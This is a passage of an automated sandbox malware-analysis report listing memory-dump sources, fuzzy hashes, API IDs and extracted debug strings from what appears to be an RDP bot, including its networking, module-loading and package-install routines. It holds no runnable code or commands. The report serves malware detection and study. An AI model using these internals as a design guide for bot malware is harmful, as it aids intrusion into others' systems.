                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterHeapLeave$FreeProcess
                    • String ID: [D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$routine_tx
                    • API String ID: 2539320189-3555278722
                    • Opcode ID: a997a4d3c2cc867a1520977a3d56c0cbdd638971f55bc1ea485832968568b02c
                    • Instruction ID: 441a3a17dc87814d513e22bf71bcf59878ec2a93dbac6c242db2e2a9b9643ba7
                    • Opcode Fuzzy Hash: a997a4d3c2cc867a1520977a3d56c0cbdd638971f55bc1ea485832968568b02c
                    • Instruction Fuzzy Hash: BD311E35A08E428AEB288F99E841239B3A0FF44FC8F186035DB5E43B65DF3DE4458300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: AttributesErrorFileLast
                    • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                    • API String ID: 1799206407-1112464793
                    • Opcode ID: 246f99be2f9a7613f0f970f80b26d1d377dd2a132c685df6de0c815cf2380339
                    • Instruction ID: f9da6b9d9c7af8cf84f521e8a18c8c8a8e9b3a49838fd0b9bd05707847679c76
                    • Opcode Fuzzy Hash: 246f99be2f9a7613f0f970f80b26d1d377dd2a132c685df6de0c815cf2380339
                    • Instruction Fuzzy Hash: 7421AF50E0C18382FB6446DDA48437C5388AF8039EF744572E74ECA6D6DE2DEEC6D252
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmp
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmp
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmp
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmp
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: AttributesErrorFileLast
                    • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                    • API String ID: 1799206407-1112464793
                    • Opcode ID: 7c20dbad54cca28f09c7073d6860dd97cea1816a0499d71971a91a429b17aa21
                    • Instruction ID: 441eaf5faaf772590a9906eda99ced3d8a9f139d69dff6b6f406e5df5833e716
                    • Opcode Fuzzy Hash: 7c20dbad54cca28f09c7073d6860dd97cea1816a0499d71971a91a429b17aa21
                    • Instruction Fuzzy Hash: 48219B50E0C443C1FB744ADC9CE4379265A6F02399F6445B2DA4E8A9B0DEBDEF859602
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmp
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmp
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmp
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmp
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: AttributesErrorFileLast
                    • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                    • API String ID: 1799206407-1112464793
                    • Opcode ID: 7a405b16ffc5785a2b6771cb9200652e3960d591a1aa19c36c4854034cebdb89
                    • Instruction ID: 48ad3f8e2683c0d468ca4ebf2a391f1f31edddad11bb497a19f76ebd8c87cb75
                    • Opcode Fuzzy Hash: 7a405b16ffc5785a2b6771cb9200652e3960d591a1aa19c36c4854034cebdb89
                    • Instruction Fuzzy Hash: 9021B450E6D48382FB20F658AC44F7DD160AF00309FA45A32D25E8A5E1CF2CE8E5626E
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorLastrecv
                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                    • API String ID: 2514157807-65069805
                    • Opcode ID: e17e57d39b6d0bf0619066593cd494d760b0a37cd43b7cfbc4e2e11104ea388d
                    • Instruction ID: 8612ae7a319476ee1dd1359d32faf91321d0e089fa5f2a727600c1cc5392ec67
                    • Opcode Fuzzy Hash: e17e57d39b6d0bf0619066593cd494d760b0a37cd43b7cfbc4e2e11104ea388d
                    • Instruction Fuzzy Hash: B6115E58E0E61751FA245BACE8612B873516F457F0F504330DF2D9AEE2DE2CF9568700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: ErrorLastrecv
                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                    • API String ID: 2514157807-65069805
                    • Opcode ID: cfbec3d80268c92a210721fa65bb7f648b19debdc5ac0ec43750b3102544e305
                    • Instruction ID: 733571e87d911fb63e6a8d039384a8577a09b5653d95f4aebb2b4d5b36266879
                    • Opcode Fuzzy Hash: cfbec3d80268c92a210721fa65bb7f648b19debdc5ac0ec43750b3102544e305
                    • Instruction Fuzzy Hash: 94110D50A0C51BC1F925A7ADEC406B42751AF857E4F619331EB2D9AAE6DE1CA546C300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: ErrorLastrecv
                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                    • API String ID: 2514157807-65069805
                    • Opcode ID: 5924ac5f7febb98cc3b4509505359a6d1b94a50e864779fcb44e8b3ea3085f99
                    • Instruction ID: 84c6bf82b8ae7ec4efc574316a9bb254f5d30fc2cf0aa66d6abfb0f1fb7d183c
                    • Opcode Fuzzy Hash: 5924ac5f7febb98cc3b4509505359a6d1b94a50e864779fcb44e8b3ea3085f99
                    • Instruction Fuzzy Hash: FF116050B0C91B46E628579CAC472741754AF427ECF60B331DF7DA66E7EE1CAA4A8300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmp
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmp
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmp
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmp
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: ErrorLastrecv
                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                    • API String ID: 2514157807-65069805
                    • Opcode ID: 687b881fdd348855cd9be93875ebccf1f6286ced463390f6bf4ec4fd153eb7a4
                    • Instruction ID: d3cf295cdf84b9c31fd8e00d17b438f10cd899c39070896c8f9524bd313d25d8
                    • Opcode Fuzzy Hash: 687b881fdd348855cd9be93875ebccf1f6286ced463390f6bf4ec4fd153eb7a4
                    • Instruction Fuzzy Hash: F5118F60A0C51BD1FA71539DAC9027A12406F437F8F4053B5DF2E8A6F6EE5CAB479300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmp
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmp
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmp
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmp
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: ErrorLastrecv
                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                    • API String ID: 2514157807-65069805
                    • Opcode ID: 71b248d79f63e3ad16b9781f2f0d4f3c64fd26030b2f447712807f0f8b8b6e07
                    • Instruction ID: 54a49b6cc683f7c40f87477be9d2cc4f61832e5d9d7b78cc60b8f4c376eb720c
                    • Opcode Fuzzy Hash: 71b248d79f63e3ad16b9781f2f0d4f3c64fd26030b2f447712807f0f8b8b6e07
                    • Instruction Fuzzy Hash: 41118251E0C69755F9105F1CA8806B82751AF407F4FA24370DE2D8A5E3FE2CA947B300
                    APIs
                    • LoadLibraryA.KERNEL32(?,?,service,000001B9FFF913D0,00007FF708879404), ref: 00007FF7088716A2
                    • GetLastError.KERNEL32(?,?,service,000001B9FFF913D0,00007FF708879404), ref: 00007FF7088716CE
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmp
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmp
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmp
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmp
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: ErrorLastLibraryLoadfflushfwrite
                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load$service
                    • API String ID: 4085810780-4145076245
                    • Opcode ID: 89ebc8c7e4f33d3e928f190608cae1c99765822385c71e9f94217e9abe4ccd82
                    • Instruction ID: 97da014fc2c1b1e2b78b283ada72f60c4022a33d1cb1f0a37939f7fdd38649d9
                    • Opcode Fuzzy Hash: 89ebc8c7e4f33d3e928f190608cae1c99765822385c71e9f94217e9abe4ccd82
                    • Instruction Fuzzy Hash: C1F03014A69A1781ED56F75AAC54DB4E6606F14BC4BC80431C90C167E5EF2CF5E9C324
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: Startupfflushfwrite
                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                    • API String ID: 3771387389-898331216
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: Startupfflushfwrite
                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                    • API String ID: 3771387389-898331216
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: Startupfflushfwrite
                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                    • API String ID: 3771387389-898331216
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: Startupfflushfwrite
                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                    • API String ID: 3771387389-898331216
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: Startupfflushfwrite
                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                    • API String ID: 3771387389-898331216
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: Startupfflushfwrite
                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                    • API String ID: 3771387389-898331216
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID: /$[W] (%s) -> Not a valid event received(size=%u,suid=%llx,packed_event_sz=%u,event_sz=%u)$[W] (%s) -> Not a valid packet received(size=%u,suid=%llx)$routine_rx
                    • API String ID: 3472027048-1600310168
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: strlen$HandleModule_mbscpy
                    • String ID: [E] (%s) -> Failed(pkg_path=%s,tgt_path=%s,err=%08x)$[I] (%s) -> Done(pkg_path=%s,tgt_path=%s)$package_install$service
                    • API String ID: 3656010895-1379287937
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: AddressErrorLastProcfflushfwrite
                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                    • API String ID: 1224403792-3063791425
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: AddressErrorLastProcfflushfwrite
                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                    • API String ID: 1224403792-3063791425
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: AddressErrorLastProcfflushfwrite
                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                    • API String ID: 1224403792-3063791425
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: AddressErrorLastProcfflushfwrite
                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                    • API String ID: 1224403792-3063791425
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: AddressErrorLastProcfflushfwrite
                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                    • API String ID: 1224403792-3063791425
                    APIs
                    • GetProcAddress.KERNEL32(?,?,00000000,000001B9FFF913D0,?,00007FF70887941F), ref: 00007FF708871633
                    • GetLastError.KERNEL32(?,?,00000000,000001B9FFF913D0,?,00007FF70887941F), ref: 00007FF708871666
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: AddressErrorLastProcfflushfwrite
                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                    • API String ID: 1224403792-3063791425
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: AddressErrorLastProcfflushfwrite
                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                    • API String ID: 1224403792-3063791425
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorLastLibraryLoadfflushfwrite
                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                    • API String ID: 4085810780-3386190286
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: ErrorLastLibraryLoadfflushfwrite
                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                    • API String ID: 4085810780-3386190286
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: ErrorLastfflushfwriteshutdown
                    • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> shutdown failed(sock=0x%llx,chan=%d,WSAgle=%d)$sock_shutdown
                    • API String ID: 2143829457-932964775
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: ErrorLastLibraryLoadfflushfwrite
                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                    • API String ID: 4085810780-3386190286
                    • Opcode ID: 9d72b4fa98c9842228753628f205ac3672df276f9da1b1e84b80ddd4ff2c3b68
                    • Instruction ID: d989370117e27ff442e7930c8d3286487e26d7d20239ba50bff6a1dc5269743b
                    • Opcode Fuzzy Hash: 9d72b4fa98c9842228753628f205ac3672df276f9da1b1e84b80ddd4ff2c3b68
                    • Instruction Fuzzy Hash: 63F0BE64E0AAD741FA43AF5EE8104B422806F08BC4F499432DE0C96B56EE1CB585E300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: ErrorLastLibraryLoadfflushfwrite
                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                    • API String ID: 4085810780-3386190286
                    • Opcode ID: bb1c619928ca4f7d8e2c426f45a5e1ff751cec92606ee6664daf73d51ae6e90a
                    • Instruction ID: 5e68b352eae296a1d0e7405c0cef4d81bcd2cd250befd975a666e64423d59853
                    • Opcode Fuzzy Hash: bb1c619928ca4f7d8e2c426f45a5e1ff751cec92606ee6664daf73d51ae6e90a
                    • Instruction Fuzzy Hash: F6F05E10A0EB4B48FD19A7DEAC434B027506F04BDDB483431CF0D16766FD6DA98A8300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: ErrorLastfflushfwriteshutdown
                    • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> shutdown failed(sock=0x%llx,chan=%d,WSAgle=%d)$sock_shutdown
                    • API String ID: 2143829457-932964775
                    • Opcode ID: 6125c0084bdc85d73f7bde19a877d0e344868a41d6e5677988897e0956617668
                    • Instruction ID: 2c386c91c3c03861e8bf1380a58259556004214e81c98ad916486d67ca05c71a
                    • Opcode Fuzzy Hash: 6125c0084bdc85d73f7bde19a877d0e344868a41d6e5677988897e0956617668
